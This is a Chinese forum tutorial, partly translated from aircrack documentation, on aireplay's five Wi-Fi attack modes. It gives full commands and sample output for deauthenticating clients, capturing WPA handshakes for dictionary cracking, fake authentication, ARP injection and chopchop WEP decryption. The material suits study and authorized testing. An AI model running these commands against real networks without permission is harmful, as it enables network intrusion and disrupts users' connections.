作者:littlepig  原址:http://www.anywlan.com/bbs/viewthread.php?tid=8251      本文大部分翻译自 aircrackpack 的作者,仅在实验室环境中测试,请勿用于非法尝试。  有一定经验的人,应该知道 aireplay 在破解中所起的作用。    如果你在实验中屡屡受挫,下面的内容应对你有用。  aireplay 有 5 种攻击模式,对应于不同情况。下面一一说来:    在下面的例子中,00:13:10:30:24:9C  是 AP(无线路由)  的 MAC  地址(on  channel  6),  00:09:5B:EB:C5:2B  是客户的 MAC address    + Attack 0: deauthentication    这种攻击模式强制断开客户端与路由端的连接, 使其重新连接, 在此期间, 可以捕获 WAP  的 handshakes,以及 WEP 的有效 ivs,并产生有效 ARP 攻击(配合‐3 攻击) 。这在实践中是非 常有效的。如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用 ‐3(见下面具体内容)也无法产生有效 ARP 攻击。如果在‐3 的同时,另外进行‐0  攻击,‐3 攻击会被立刻激活。   
Anywhere WLAN!!    67 

 

 

中国无线门户 

显而易见,如果没有客户端是不成的。    Some examples:    o WPA Handshake capture with an Atheros    airmon.sh start ath0  airodump ath0 out 6 (switch to another console)  aireplay ‐0 5 ‐a 00:13:10:30:24:9C ‐c 00:09:5B:EB:C5:2B ath0  (wait for a few seconds)  aircrack ‐w /path/to/dictionary out.cap    o ARP request generation with a Prism2 card    airmon.sh start wlan0  airodump wlan0 out 6 (switch to another console)  aireplay ‐0 5 ‐a 00:13:10:30:24:9C wlan0  aireplay ‐3 ‐b 00:13:10:30:24:9C ‐h 00:09:5B:EB:C5:2B wlan0    aireplay ‐0 5 ‐‐‐‐‐‐进行五次攻击,如果为 0,则循环攻击,客户端无法正常上网,不停的断开 连接。    ‐a  后是路由的 mac 地址。可以加  ‐h  后为攻击的客户端的 mac 地址,也可以不加。    wlan0  为自己的网卡名。 ifconfig ‐a  看, 用 也可以是 wifi0, ath1 等等。 有很多帖子都有叙述, 这里就不再多说了。      + Attack 1: fake authentication    这种攻击在没有合法客户端与路由相连时有些用处, 这里我们伪装了一个客户端并使之育路 由连接。这个操作可以配合  ‐3 (ARP request reinjection)和  ‐4 ("chopchop" WEP decryption).使 用。如果,有客户端,则针对客户端使用‐3  或  ‐4  更为有效。    实际上,如果没有客户端的话,这种攻击很可能没有效果。      aireplay ‐1 0 ‐e myap ‐a 00:13:10:30:24:9C ‐h 0:1:2:3:4:5 ath0  12:14:06 Sending Authentication Request  12:14:06 Authentication successful  12:14:06 Sending Association Request  12:14:07 Association successful :‐)    +‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐+  | With patched madwifi CVS 2005‐08‐14, it's possible to inject |  | packets while in Managed mode (the WEP key itself doesn't matter, | 

Anywhere WLAN!! 

 

68 

 

 

中国无线门户 

| as long as the AP accepts Open‐System authentication). So, instead |  | of running attack 1, you may just associate and inject / monitor |  | through the athXraw interface: |  | |  | ifconfig ath0 down hw ether 00:10:20:30:40:50 |  | iwconfig ath0 mode Managed essid myap key AAAAAAAAAA |  | ifconfig ath0 up |  | |  | sysctl ‐w dev.ath0.rawdev=1 |  | ifconfig ath0raw up |  | airodump ath0raw out 6 |  | |  | Then you can run attack 3 or 4 (aireplay will automatically replace |  | ath0 with ath0raw below): |  | |  | aireplay ‐3 ‐h 00:10:20:30:40:50 ‐b 00:13:10:30:24:9C ath0 |  | aireplay ‐4 ‐h 00:10:20:30:40:50 ‐f 1 ath0 |  | |  +‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐+    Some access points require to reassociate every 30 seconds, otherwise  our fake client is considered disconnected. In this case, setup the  periodic re‐association delay:    aireplay ‐1 30 ‐e myap ‐a 00:13:10:30:24:9C ‐h 0:1:2:3:4:5 ath0    + Attack 2: interactive packet replay    这种攻击模式基本无用,只是某些时候做测试用。    aireplay ‐2 ‐f 0 ‐t 1 ‐d FF:FF:FF:FF:FF:FF ‐n 90 ath0    + Attack 3: ARP‐request reinjection    这种攻击模式是最为有效的。这里你既可以利用合法客户端,也可以配合‐1  利用伪装客户 端。一般情况下,你需要等几分钟直到出现有效 ARP request.  如果没有任何通信存在,则这 种攻击就会失败。在实践中,如果合法客户端和路由之间长时间内没有 ARP  request,可以 尝试同时使用‐0  攻击。    Please note that you can also reuse ARP requests from a previous  capture using the ‐r switch.    aireplay ‐3 ‐b 00:13:10:30:24:9C ‐h 0:1:2:3:4:5 ath0  Saving ARP requests in replay_arp‐0627‐121526.cap 

Anywhere WLAN!! 

 

69 

 

 

中国无线门户 

You must also start airodump to capture replies.  Read 2493 packets (got 1 ARP requests), sent 1305 packets...    + Attack 4: KoreK's "chopchop" (CRC prediction)    这种攻击模式不常用,但是一旦成果,则可以在不知道密码的情况下破解 WEP 包。    This attack, when successful, can decrypt a WEP data packet without  knowing the key. It can even work against dynamic WEP. This attack does  not recover the WEP key itself, but merely reveals the plaintext.  However, most access points are not vulnerable at all. Some may seem  vulnerable at first but actually drop data packets shorter that 60  bytes. This attack requires at least one WEP data packet.    1. First, we decrypt one packet :    aireplay ‐4 ‐h 00:09:5B:EB:C5:2B ath0    2. Let's have a look at the IP address :    tcpdump ‐s 0 ‐n ‐e ‐r replay_dec‐0627‐022301.cap  reading from file replay_dec‐0627‐022301.cap, link‐type [...]  IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1    3. Then, forge an ARP request.    The source IP (192.168.1.100) doesn't matter, but the destination  IP (192.168.1.2) must respond to ARP requests. The source MAC must  belong to an associated station.    ./arpforge replay_dec‐0627‐022301.xor 1 00:13:10:30:24:9C \  00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap    4. And replay our forged ARP request :    aireplay ‐2 ‐r arp.cap ath0   

Anywhere WLAN!! 

 

70 


								
To top